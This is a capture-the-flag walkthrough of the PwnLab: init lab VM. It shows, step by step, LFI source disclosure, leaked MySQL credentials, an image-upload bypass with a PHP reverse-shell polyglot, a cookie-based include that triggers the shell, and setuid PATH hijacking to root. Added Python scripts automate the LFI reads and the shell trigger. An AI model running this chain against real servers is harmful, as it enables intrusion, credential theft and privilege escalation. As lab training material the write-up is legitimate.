Pwnlab_init

Tools:

  • netdiscover
  • Nmap
  • nikto
  • DirBuster
  • sqlmap
  • Burp
  • mysql client
  • curl
  • netcat

Use netdiscover to find the target's IP address on the lab network:

netdiscover -i eth0 -r 192.168.50.0/24

192.168.50.131 is the target.

Then run nmap against all ports to find open ports and identify the services running on the target:

nmap -sV -v -O -A -T5 192.168.50.131 -p-

Port 80 (HTTP) is open. The MySQL port must also be reachable from the attacking host, because later on the database is connected to directly rather than through a shell on the box.

Scan the web server with nikto:

nikto -h 192.168.50.131

Use DirBuster to enumerate directories and files.

Check the page:

Try sqlmap against every form it can crawl:

sqlmap -u "http://192.168.50.131" --forms --batch --crawl=10 --level=5 --risk=3 --random-agent --dbms=MySQL

Nothing: no injectable parameter is found.

Check the page source code.

The page parameter looks like it is passed to an include, i.e. a local file inclusion (LFI). Test it with the php://filter wrapper, which returns the target file base64-encoded instead of letting PHP execute it:

curl http://192.168.50.131/?page=php://filter/convert.base64-encode/resource=config

This returns the base64-encoded content of config.php (the include appends .php, so resource=config is enough). Decode it:

echo PD9waHANCiRzZXJ2ZXIJICA9ICJsb2NhbGhvc3QiOw0KJHVzZXJuYW1lID0gInJvb3QiOw0KJHBhc3N3b3JkID0gIkl9IOTkiOw0KJGRhdGFiYXNlID0gIlVzZXJzIjsNCj8+ | base64 --decode

The decoded file holds the MySQL credentials: user root, password H4u%QJ_H99, database Users.

Connect to the MySQL server on the target with them (quote the password, it contains shell-special characters):

mysql -h 192.168.50.131 -u root -p'H4u%QJ_H99'

List the databases, select Users, and dump the users table:

mysql> show databases;
mysql> use Users;
mysql> show tables;
mysql> select * from users;

The passwords in the users table are base64 encoded. Decoded they are:

kent | JWzXuBJJNy
mike | SIfdsTEn6I
kane | iSv5Ym2GRo

Log in to the web application as kane.

Trying to upload a PHP webshell fails: only images are accepted.

To find out exactly what the upload check requires, fetch the source of upload.php through the same LFI:

curl http://192.168.50.131/?page=php://filter/convert.base64-encode/resource=upload

Decode the content:

<?php
session_start();
if (!isset($_SESSION['user'])) { die('You must be log in.'); }
?>
<html>
  <body>
      <form action='' method='post' enctype='multipart/form-data'>
          <input type='file' name='file' id='file' />
          <input type='submit' name='submit' value='Upload'/>
      </form>
  </body>
</html>
<?php
if(isset($_POST['submit'])) {
  if ($_FILES['file']['error'] <= 0) {
      $filename  = $_FILES['file']['name'];
      $filetype  = $_FILES['file']['type'];
      $uploaddir = 'upload/';
      $file_ext  = strrchr($filename, '.');
      $imageinfo = getimagesize($_FILES['file']['tmp_name']);
      $whitelist = array(".jpg",".jpeg",".gif",".png");

      if (!(in_array($file_ext, $whitelist))) {
          die('Not allowed extension, please upload images only.');
      }

      if(strpos($filetype,'image') === false) {
          die('Error 001');
      }

      if($imageinfo['mime'] != 'image/gif' && $imageinfo['mime'] != 'image/jpeg' && $imageinfo['mime'] != 'image/jpg'&& $imageinfo['mime'] != 'image/png') {
          die('Error 002');
      }

      if(substr_count($filetype, '/')>1){
          die('Error 003');
      }

      $uploadfile = $uploaddir . md5(basename($_FILES['file']['name'])).$file_ext;

      if (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)) {
          echo "<img src=\"".$uploadfile."\"><br />";
      } else {
          die('Error 4');
      }
  }
}

So the extension whitelist is $whitelist = array(".jpg",".jpeg",".gif",".png"), but the extension is only one of four checks. The multipart part's Content-Type ($_FILES['file']['type']) must contain the string "image" and must not contain a second "/", and getimagesize() must recognise the content as gif, jpeg or png, which means the file has to start with a real image header. Nothing checks what follows that header. The file is stored as upload/<md5 of the original filename><extension>, and that path is echoed back in the <img> tag.

So: prepend a GIF signature (GIF89a) to a PHP reverse shell, save it with a .gif extension, and in Burp set the part's Content-Type to image/gif.

The PHP shell is now uploaded.

Now I need a way to execute it. Check index.php, again through the LFI:

curl http://192.168.50.131/?page=php://filter/convert.base64-encode/resource=index

<?php
//Multilingual. Not implemented yet.
//setcookie("lang","en.lang.php");
if (isset($_COOKIE['lang']))
{
  include("lang/".$_COOKIE['lang']);
}
// Not implemented yet.
?>
<html>
<head>
<title>PwnLab Intranet Image Hosting</title>
</head>
<body>
<center>
<img src="images/pwnlab.png"><br />
[ <a href="/">Home</a> ] [ <a href="?page=login">Login</a> ] [ <a href="?page=upload">Upload</a> ]
<hr/><br/>
<?php
  if (isset($_GET['page']))
  {
      include($_GET['page'].".php");
  }
  else
  {
      echo "Use this server to upload and share image files inside the intranet";
  }
?>
</center>
</body>
</html>

So the lang cookie is a second LFI: include("lang/".$_COOKIE['lang']) appends nothing to the value, whereas the page parameter always gets ".php" appended, so the uploaded .gif can only be included through the cookie, using ../ to step back out of lang/ into the web root.

First verify the LFI with the cookie.

Then set up a netcat listener on port 443 and request the page with the lang cookie pointing at the uploaded file.

That gives the shell.
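As an added example (not from the writeup), the two LFI uses above in one Python helper: reading source through the page parameter with php://filter, and firing the uploaded polyglot through the lang cookie. The host is the target from the writeup; the upload filename and the exact layout of index.php's template around the included output are assumptions, and the test input is a constructed page fragment.

```python
import base64
import hashlib
import re
import urllib.request

HOST = "192.168.50.131"   # target from the writeup


def filter_read_url(host, resource):
    """index.php does include($_GET['page'].".php"), so resource=config reads
    config.php; the base64 filter makes PHP return the source unexecuted."""
    return f"http://{host}/?page=php://filter/convert.base64-encode/resource={resource}"


def decode_filter_output(html):
    """The included file's base64 lands between the <hr/><br/> and the
    </center> of index.php's template (see the source above); cut it out and
    decode it."""
    m = re.search(r"<hr/><br/>\s*([A-Za-z0-9+/=\s]+?)\s*</center>", html)
    if not m:
        raise ValueError("no base64 payload found in page")
    return base64.b64decode("".join(m.group(1).split()))


def read_source(host, resource):
    with urllib.request.urlopen(filter_read_url(host, resource)) as resp:
        return decode_filter_output(resp.read().decode(errors="replace"))


def stored_name(upload_filename):
    """upload.php renames the file to md5(basename) plus the original extension."""
    ext = upload_filename[upload_filename.rfind("."):] if "." in upload_filename else ""
    return hashlib.md5(upload_filename.encode()).hexdigest() + ext


def lang_cookie(upload_filename):
    """include("lang/".$_COOKIE['lang']) appends no suffix, unlike ?page=
    which adds ".php", so the .gif can only be included here. The ../ steps
    out of lang/ back to the web root where upload/ lives."""
    return "lang=../upload/" + stored_name(upload_filename)


def trigger(host, upload_filename):
    """GET / with the cookie set; PHP includes and executes the polyglot."""
    req = urllib.request.Request(f"http://{host}/",
                                 headers={"Cookie": lang_cookie(upload_filename)})
    with urllib.request.urlopen(req) as resp:
        return resp.status


if __name__ == "__main__":
    print(read_source(HOST, "config").decode(errors="replace"))
    # nc -lvnp 443 should already be listening; "shell.gif" is the assumed
    # name the polyglot was uploaded under.
    print(trigger(HOST, "shell.gif"))
```

The request to trigger() blocks for as long as the reverse shell stays connected, because PHP is still running the included file; that is expected, and the interesting output is on the netcat side.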

Switch to kane:

su kane

In kane's home directory there is an interesting file, msgmike:

ls -alh msgmike

Its setuid bit is set.

Try running it:

./msgmike

It prints: cat: /home/mike/msg.txt: No such file or directory

So the binary calls cat by name, without an absolute path, and the lookup goes through PATH.

Hijack that lookup: put the current directory first in PATH and plant an executable named cat that starts a shell instead:

export PATH=.:$PATH
echo "/bin/bash" > cat
chmod +x cat
./msgmike

The fake cat runs with the privileges of the setuid binary, so this drops into a shell as mike.
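As an added example (not from the writeup), a Python model of why the PATH hijack works and what the binary should have done instead. The fake cat here only prints a marker, where the writeup's fake cat starts /bin/bash; the command string is assumed to be system("cat /home/mike/msg.txt"), which is what the error message above implies.

```python
import os
import subprocess
import tempfile

# Stand-in for the page's fake cat (echo "/bin/bash" > cat): prints a marker
# instead of spawning a shell so the effect is visible in captured output.
FAKE_CAT = "#!/bin/sh\necho hijacked by PATH\n"


def run_like_msgmike(path):
    """Mimics system("cat /home/mike/msg.txt"): the command is a shell string
    and 'cat' has no directory, so /bin/sh resolves it through PATH."""
    return subprocess.run("cat /home/mike/msg.txt", shell=True,
                          env={"PATH": path}, capture_output=True, text=True).stdout


def plant_fake_cat(directory):
    fake = os.path.join(directory, "cat")
    with open(fake, "w") as f:
        f.write(FAKE_CAT)
    os.chmod(fake, 0o755)
    return fake


def path_hijack_demo():
    """Attacker's directory first in PATH, like export PATH=.:$PATH."""
    with tempfile.TemporaryDirectory() as d:
        plant_fake_cat(d)
        return run_like_msgmike(d + ":/usr/bin:/bin")


def hardened_demo():
    """What a setuid program needs instead: absolute path, no shell, and a
    PATH it sets itself rather than inheriting. The planted cat is never used."""
    with tempfile.TemporaryDirectory() as d:
        plant_fake_cat(d)
        msg = os.path.join(d, "msg.txt")
        with open(msg, "w") as f:
            f.write("real message\n")
        return subprocess.run(["/bin/cat", msg], env={"PATH": "/usr/bin:/bin"},
                              capture_output=True, text=True).stdout


if __name__ == "__main__":
    print(path_hijack_demo(), end="")   # hijacked by PATH
    print(hardened_demo(), end="")      # real message
```

The point of hardened_demo() is that neither the caller's PATH nor a shell is involved: the program names /bin/cat explicitly and supplies its own environment, so nothing the unprivileged caller controls influences what gets executed.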

As mike, there is another setuid program, msg2root.

Run msg2root; it prompts:

Message for root:

Upload setuid.c and compile it.

Run msg2root again and get root.
